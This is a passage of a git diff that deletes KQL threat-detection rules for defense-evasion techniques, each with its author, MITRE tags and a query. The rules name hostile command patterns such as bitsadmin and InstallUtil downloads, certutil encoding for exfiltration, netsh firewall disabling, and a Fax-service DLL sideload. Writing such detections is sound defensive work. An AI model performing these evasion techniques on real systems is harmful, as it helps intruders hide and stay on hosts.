+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2021/12/09
-// Level: high
-// Description: Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (not(FolderPath contains "\\")) and (not((((FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or (ProcessCommandLine in~ ("Registry", "MemCompression", "vmmem"))) or (FolderPath in~ ("-", "")) or isnull(FolderPath))))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_from_Suspicious_Folder.kql b/Defense Evasion/Execution_from_Suspicious_Folder.kql
deleted file mode 100644
index 41e17b99..00000000
--- a/Defense Evasion/Execution_from_Suspicious_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Tim Shelton
-// Date: 2019/01/16
-// Level: high
-// Description: Detects a suspicious execution from an uncommon folder
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ((FolderPath contains "\\$Recycle.bin\\" or FolderPath contains "\\config\\systemprofile\\" or FolderPath contains "\\Intel\\Logs\\" or FolderPath contains "\\RSA\\MachineKeys\\" or FolderPath contains "\\Users\\All Users\\" or FolderPath contains "\\Users\\Default\\" or FolderPath contains "\\Users\\NetworkService\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\addins\\" or FolderPath contains "\\Windows\\debug\\" or FolderPath contains "\\Windows\\Fonts\\" or FolderPath contains "\\Windows\\Help\\" or FolderPath contains "\\Windows\\IME\\" or FolderPath contains "\\Windows\\Media\\" or FolderPath contains "\\Windows\\repair\\" or FolderPath contains "\\Windows\\security\\" or FolderPath contains "\\Windows\\System32\\Tasks\\" or FolderPath contains "\\Windows\\Tasks\\") or FolderPath startswith "C:\\Perflogs\\") and (not(((FolderPath endswith "\\CitrixReceiverUpdater.exe" and FolderPath startswith "C:\\Windows\\SysWOW64\\config\\systemprofile\\Citrix\\UpdaterBinaries\\") or FolderPath startswith "C:\\Users\\Public\\IBM\\ClientSolutions\\Start_Programs\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql b/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql
deleted file mode 100644
index 518a4a2d..00000000
--- a/Defense Evasion/Execution_of_Suspicious_File_Type_Extension.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2021/12/09
-// Level: medium
-// Description: Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
-This rule might require some initial baselining to align with some third party tooling in the user environment.
-
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (not((FolderPath endswith ".bin" or FolderPath endswith ".cgi" or FolderPath endswith ".com" or FolderPath endswith ".exe" or FolderPath endswith ".scr" or FolderPath endswith ".tmp"))) and (not((FolderPath contains ":\\$Extend\\$Deleted\\" or FolderPath contains ":\\Windows\\System32\\DriverStore\\FileRepository\\" or (FolderPath in~ ("-", "")) or (FolderPath in~ ("System", "Registry", "MemCompression", "vmmem")) or FolderPath contains ":\\Windows\\Installer\\MSI" or (FolderPath contains ":\\Config.Msi\\" and (FolderPath endswith ".rbf" or FolderPath endswith ".rbs")) or isnull(FolderPath) or (InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or FolderPath contains ":\\Windows\\Temp\\")))) and (not((InitiatingProcessFolderPath contains ":\\ProgramData\\Avira\\" or (FolderPath endswith "com.docker.service" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\services.exe") or FolderPath contains ":\\Program Files\\Mozilla Firefox\\" or FolderPath endswith "\\LZMA_EXE" or (FolderPath endswith ":\\Program Files (x86)\\MyQ\\Server\\pcltool.dll" or FolderPath endswith ":\\Program Files\\MyQ\\Server\\pcltool.dll") or (FolderPath contains "NVIDIA\\NvBackend\\" and FolderPath endswith ".dat") or ((FolderPath contains ":\\Program Files (x86)\\WINPAKPRO\\" or FolderPath contains ":\\Program Files\\WINPAKPRO\\") and FolderPath endswith ".ngn") or (FolderPath contains "\\AppData\\Local\\Packages\\" and FolderPath contains "\\LocalState\\rootfs\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_via_WorkFolders.exe.kql b/Defense Evasion/Execution_via_WorkFolders.exe.kql
deleted file mode 100644
index aa865be5..00000000
--- a/Defense Evasion/Execution_via_WorkFolders.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Maxime Thiebaut (@0xThiebaut)
-// Date: 2021/10/21
-// Level: high
-// Description: Detects using WorkFolders.exe to execute an arbitrary control.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (FolderPath endswith "\\control.exe" and InitiatingProcessFolderPath endswith "\\WorkFolders.exe") and (not(FolderPath =~ "C:\\Windows\\System32\\control.exe"))
\ No newline at end of file
diff --git a/Defense Evasion/Execution_via_stordiag.exe.kql b/Defense Evasion/Execution_via_stordiag.exe.kql
deleted file mode 100644
index 7bc49c98..00000000
--- a/Defense Evasion/Execution_via_stordiag.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Austin Songer (@austinsonger)
-// Date: 2021/10/21
-// Level: high
-// Description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ((FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\fltmc.exe") and InitiatingProcessFolderPath endswith "\\stordiag.exe") and (not((InitiatingProcessFolderPath startswith "c:\\windows\\system32\\" or InitiatingProcessFolderPath startswith "c:\\windows\\syswow64\\")))
\ No newline at end of file
diff --git a/Defense Evasion/Explorer_NOUACCHECK_Flag.kql b/Defense Evasion/Explorer_NOUACCHECK_Flag.kql
deleted file mode 100644
index f23f2ead..00000000
--- a/Defense Evasion/Explorer_NOUACCHECK_Flag.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/02/23
-// Level: high
-// Description: Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
-// Tags: attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/NOUACCHECK" and FolderPath endswith "\\explorer.exe") and (not((InitiatingProcessCommandLine =~ "C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\svchost.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Explorer_Process_Tree_Break.kql b/Defense Evasion/Explorer_Process_Tree_Break.kql
deleted file mode 100644
index 0193292f..00000000
--- a/Defense Evasion/Explorer_Process_Tree_Break.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), @gott_cyber
-// Date: 2019/06/29
-// Level: medium
-// Description: Detects a command line process that uses explorer.exe to launch arbitrary commands or binaries,
-which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
-
-// Tags: attack.defense_evasion, attack.t1036
-DeviceProcessEvents
-| where ProcessCommandLine contains "/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b}" or (ProcessCommandLine contains "explorer.exe" and ProcessCommandLine contains " /root,")
\ No newline at end of file
diff --git a/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql b/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql
deleted file mode 100644
index 30f379f3..00000000
--- a/Defense Evasion/Fax_Service_DLL_Search_Order_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: NVISO
-// Date: 2020/05/04
-// Level: high
-// Description: The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.
-// Tags: attack.persistence, attack.defense_evasion, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "ualapi.dll" and InitiatingProcessFolderPath endswith "\\fxssvc.exe") and (not(FolderPath startswith "C:\\Windows\\WinSxS\\"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql b/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql
deleted file mode 100644
index e6a60f52..00000000
--- a/Defense Evasion/File_Deleted_Via_Sysinternals_SDelete.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: Detects the deletion of files by the Sysinternals SDelete utility. It looks for the common name pattern used to rename files.
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceFileEvents
-| where (FolderPath endswith ".AAA" or FolderPath endswith ".ZZZ") and (not(FolderPath endswith "\\Wireshark\\radius\\dictionary.alcatel-lucent.aaa"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Deletion_Via_Del.kql b/Defense Evasion/File_Deletion_Via_Del.kql
deleted file mode 100644
index e572cd87..00000000
--- a/Defense Evasion/File_Deletion_Via_Del.kql
+++ /dev/null
@@ -1,11 +0,0 @@
-// Author: frack113
-// Date: 2022/01/15
-// Level: low
-// Description: Detects execution of the builtin "del"/"erase" commands in order to delete files.
-Adversaries may delete files left behind by the actions of their intrusion activity.
-Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how.
-Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
-
-// Tags: attack.defense_evasion, attack.t1070.004
-DeviceProcessEvents
-| where (ProcessCommandLine contains "del " or ProcessCommandLine contains "erase ") and (ProcessCommandLine contains " -f" or ProcessCommandLine contains " /f" or ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " -q" or ProcessCommandLine contains " /q") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql b/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql
deleted file mode 100644
index 7413072b..00000000
--- a/Defense Evasion/File_Download_Using_ProtocolHandler.exe.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: frack113
-// Date: 2021/07/13
-// Level: medium
-// Description: Detects usage of "ProtocolHandler" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\Microsoft\Windows\INetCache\IE)
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\protocolhandler.exe" or ProcessVersionInfoOriginalFileName =~ "ProtocolHandler.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin.kql b/Defense Evasion/File_Download_Via_Bitsadmin.kql
deleted file mode 100644
index e877ea4a..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, FPT.EagleEye
-// Date: 2017/03/09
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe") and (ProcessCommandLine contains " /transfer " or ((ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and ProcessCommandLine contains "http"))
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql b/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
deleted file mode 100644
index c7fb9c33..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin_To_A_Suspicious_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file to a suspicious target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains ":\\Perflogs" or ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "%ProgramData%" or ProcessCommandLine contains "%public%") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql b/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
deleted file mode 100644
index 7c74c2ea..00000000
--- a/Defense Evasion/File_Download_Via_Bitsadmin_To_An_Uncommon_Target_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: medium
-// Description: Detects usage of bitsadmin downloading a file to uncommon target folder
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (ProcessCommandLine contains "%AppData%" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "\\AppData\\Local\\" or ProcessCommandLine contains "C:\\Windows\\Temp\\") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql b/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql
deleted file mode 100644
index 90991c2d..00000000
--- a/Defense Evasion/File_Download_Via_InstallUtil.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/19
-// Level: medium
-// Description: Detects use of .NET InstallUtil.exe in order to download arbitrary files. The files will be written to "%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\"
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://") and (FolderPath endswith "\\InstallUtil.exe" or ProcessVersionInfoOriginalFileName =~ "InstallUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql b/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql
deleted file mode 100644
index c687fb97..00000000
--- a/Defense Evasion/File_Download_Via_Windows_Defender_MpCmpRun.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Matthew Matchen
-// Date: 2020/09/04
-// Level: high
-// Description: Detects the use of Windows Defender MpCmdRun.EXE to download files
-// Tags: attack.defense_evasion, attack.t1218, attack.command_and_control, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "DownloadFile" and ProcessCommandLine contains "url") and (ProcessVersionInfoOriginalFileName =~ "MpCmdRun.exe" or FolderPath endswith "\\MpCmdRun.exe" or ProcessCommandLine contains "MpCmdRun.exe" or ProcessVersionInfoFileDescription =~ "Microsoft Malware Protection Command Line Utility")
\ No newline at end of file
diff --git a/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index 2eefdfc1..00000000
--- a/Defense Evasion/File_Encoded_To_Base64_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/02/24
-// Level: medium
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql b/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql
deleted file mode 100644
index f034c2e4..00000000
--- a/Defense Evasion/File_In_Suspicious_Location_Encoded_To_Base64_Via_Certutil.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/15
-// Level: high
-// Description: Detects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
-// Tags: attack.defense_evasion, attack.t1027
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-encode" or ProcessCommandLine contains "/encode") and (ProcessCommandLine contains "\\AppData\\Roaming\\" or ProcessCommandLine contains "\\Desktop\\" or ProcessCommandLine contains "\\Local\\Temp\\" or ProcessCommandLine contains "\\PerfLogs\\" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\Windows\\Temp\\" or ProcessCommandLine contains "$Recycle.Bin") and (FolderPath endswith "\\certutil.exe" or ProcessVersionInfoOriginalFileName =~ "CertUtil.exe")
\ No newline at end of file
diff --git a/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql b/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
deleted file mode 100644
index 03b37b13..00000000
--- a/Defense Evasion/File_With_Suspicious_Extension_Downloaded_Via_Bitsadmin.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/28
-// Level: high
-// Description: Detects usage of bitsadmin downloading a file with a suspicious extension
-// Tags: attack.defense_evasion, attack.persistence, attack.t1197, attack.s0190, attack.t1036.003
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".7z" or ProcessCommandLine contains ".asax" or ProcessCommandLine contains ".ashx" or ProcessCommandLine contains ".asmx" or ProcessCommandLine contains ".asp" or ProcessCommandLine contains ".aspx" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cfm" or ProcessCommandLine contains ".cgi" or ProcessCommandLine contains ".chm" or ProcessCommandLine contains ".cmd" or ProcessCommandLine contains ".dll" or ProcessCommandLine contains ".gif" or ProcessCommandLine contains ".jpeg" or ProcessCommandLine contains ".jpg" or ProcessCommandLine contains ".jsp" or ProcessCommandLine contains ".jspx" or ProcessCommandLine contains ".log" or ProcessCommandLine contains ".png" or ProcessCommandLine contains ".ps1" or ProcessCommandLine contains ".psm1" or ProcessCommandLine contains ".rar" or ProcessCommandLine contains ".scf" or ProcessCommandLine contains ".sct" or ProcessCommandLine contains ".txt" or ProcessCommandLine contains ".vbe" or ProcessCommandLine contains ".vbs" or ProcessCommandLine contains ".war" or ProcessCommandLine contains ".wsf" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".xll" or ProcessCommandLine contains ".zip") and (ProcessCommandLine contains " /transfer " or ProcessCommandLine contains " /create " or ProcessCommandLine contains " /addfile ") and (FolderPath endswith "\\bitsadmin.exe" or ProcessVersionInfoOriginalFileName =~ "bitsadmin.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql b/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql
deleted file mode 100644
index 252e71d1..00000000
--- a/Defense Evasion/Files_With_System_Process_Name_In_Unsuspected_Locations.kql
+++ /dev/null
@@ -1,9 +0,0 @@ -// Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020/05/26 -// Level: medium -// Description: Detects the creation of an executable with a system process name in folders other than the system ones (System32, SysWOW64, etc.). -It is highly recommended to perform an initial baseline before using this rule in production. - -// Tags: attack.defense_evasion, attack.t1036.005 -DeviceFileEvents -| where (FolderPath endswith "\\AtBroker.exe" or FolderPath endswith "\\audiodg.exe" or FolderPath endswith "\\backgroundTaskHost.exe" or FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\cmdl32.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\conhost.exe" or FolderPath endswith "\\csrss.exe" or FolderPath endswith "\\dasHost.exe" or FolderPath endswith "\\dfrgui.exe" or FolderPath endswith "\\dllhost.exe" or FolderPath endswith "\\dwm.exe" or FolderPath endswith "\\eventcreate.exe" or FolderPath endswith "\\eventvwr.exe" or FolderPath endswith "\\explorer.exe" or FolderPath endswith "\\extrac32.exe" or FolderPath endswith "\\fontdrvhost.exe" or FolderPath endswith "\\ipconfig.exe" or FolderPath endswith "\\iscsicli.exe" or FolderPath endswith "\\iscsicpl.exe" or FolderPath endswith "\\logman.exe" or FolderPath endswith "\\LogonUI.exe" or FolderPath endswith "\\LsaIso.exe" or FolderPath endswith "\\lsass.exe" or FolderPath endswith "\\lsm.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msinfo32.exe" or FolderPath endswith "\\mstsc.exe" or FolderPath endswith "\\nbtstat.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regini.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\RuntimeBroker.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith 
"\\SearchFilterHost.exe" or FolderPath endswith "\\SearchIndexer.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\SecurityHealthService.exe" or FolderPath endswith "\\SecurityHealthSystray.exe" or FolderPath endswith "\\services.exe" or FolderPath endswith "\\ShellAppRuntime.exe" or FolderPath endswith "\\sihost.exe" or FolderPath endswith "\\smartscreen.exe" or FolderPath endswith "\\smss.exe" or FolderPath endswith "\\spoolsv.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\SystemSettingsBroker.exe" or FolderPath endswith "\\taskhost.exe" or FolderPath endswith "\\taskhostw.exe" or FolderPath endswith "\\Taskmgr.exe" or FolderPath endswith "\\TiWorker.exe" or FolderPath endswith "\\vssadmin.exe" or FolderPath endswith "\\w32tm.exe" or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WerFaultSecure.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\wininit.exe" or FolderPath endswith "\\winlogon.exe" or FolderPath endswith "\\winrshost.exe" or FolderPath endswith "\\WinRTNetMUAHostServer.exe" or FolderPath endswith "\\wlanext.exe" or FolderPath endswith "\\wlrmdr.exe" or FolderPath endswith "\\WmiPrvSE.exe" or FolderPath endswith "\\wslhost.exe" or FolderPath endswith "\\WSReset.exe" or FolderPath endswith "\\WUDFHost.exe" or FolderPath endswith "\\WWAHost.exe") and (not((FolderPath endswith "C:\\Windows\\explorer.exe" or (FolderPath contains "\\SystemRoot\\System32\\" or FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\uus\\") or (InitiatingProcessFolderPath endswith "\\SecurityHealthSetup.exe" and FolderPath contains "C:\\Windows\\System32\\SecurityHealth\\" and 
FolderPath endswith "\\SecurityHealthSystray.exe") or (InitiatingProcessFolderPath endswith "C:\\WINDOWS\\system32\\msiexec.exe" and (FolderPath endswith "C:\\Program Files\\PowerShell\\7\\pwsh.exe" or FolderPath endswith "C:\\Program Files\\PowerShell\\7-preview\\pwsh.exe")) or (InitiatingProcessFolderPath endswith "C:\\Windows\\system32\\svchost.exe" and FolderPath contains "C:\\Program Files\\WindowsApps\\") or InitiatingProcessFolderPath endswith "C:\\Windows\\System32\\wuauclt.exe"))) \ No newline at end of file diff --git a/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql b/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql deleted file mode 100644 index 3c11c9c1..00000000 --- a/Defense Evasion/Filter_Driver_Unloaded_Via_Fltmc.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali -// Date: 2023/02/13 -// Level: high -// Description: Detect filter driver unloading activity via fltmc.exe -// Tags: attack.defense_evasion, attack.t1070, attack.t1562, attack.t1562.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "unload" and (FolderPath endswith "\\fltMC.exe" or ProcessVersionInfoOriginalFileName =~ "fltMC.exe")) and (not(ProcessCommandLine endswith "unload rtp_filesystem_filter")) \ No newline at end of file diff --git a/Defense Evasion/Findstr_Launching_.lnk_File.kql b/Defense Evasion/Findstr_Launching_.lnk_File.kql deleted file mode 100644 index 64018244..00000000 --- a/Defense Evasion/Findstr_Launching_.lnk_File.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Trent Liffick
-// Date: 2020/05/01
-// Level: medium
-// Description: Detects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
-// Tags: attack.defense_evasion, attack.t1036, attack.t1202, attack.t1027.003
-DeviceProcessEvents
-| where (ProcessCommandLine endswith ".lnk" or ProcessCommandLine endswith ".lnk\"" or ProcessCommandLine endswith ".lnk'") and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql b/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql
deleted file mode 100644
index cd3e65d2..00000000
--- a/Defense Evasion/Firewall_Disabled_via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Fatih Sirin
-// Date: 2019/11/01
-// Level: medium
-// Description: Detects netsh commands that turns off the Windows firewall
-// Tags: attack.defense_evasion, attack.t1562.004, attack.s0108
-DeviceProcessEvents
-| where (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") and ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "opmode" and ProcessCommandLine contains "disable") or (ProcessCommandLine contains "advfirewall" and ProcessCommandLine contains "set" and ProcessCommandLine contains "state" and ProcessCommandLine contains "off"))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql b/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql
deleted file mode 100644
index 327f798c..00000000
--- a/Defense Evasion/Firewall_Rule_Deleted_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/08/14
-// Level: medium
-// Description: Detects the removal of a port or application rule in the Windows Firewall configuration using netsh
-// Tags: attack.defense_evasion, attack.t1562.004
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "firewall" and ProcessCommandLine contains "delete ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")) and (not((ProcessCommandLine contains "name=Dropbox" and InitiatingProcessFolderPath endswith "\\Dropbox.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql b/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql
deleted file mode 100644
index d08734e3..00000000
--- a/Defense Evasion/Firewall_Rule_Update_Via_Netsh.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/07/18
-// Level: medium
-// Description: Detects execution of netsh with the "advfirewall" and the "set" option in order to set new values for properties of a existing rule
-// Tags: attack.defense_evasion
-DeviceProcessEvents
-| where (ProcessCommandLine contains " firewall " and ProcessCommandLine contains " set ") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe")
\ No newline at end of file
diff --git a/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql b/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql
deleted file mode 100644
index a504127b..00000000
--- a/Defense Evasion/Folder_Removed_From_Exploit_Guard_ProtectedFolders_List_-_Registry.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects the removal of folders from the "ProtectedFolders" list of of exploit guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceRegistryEvents
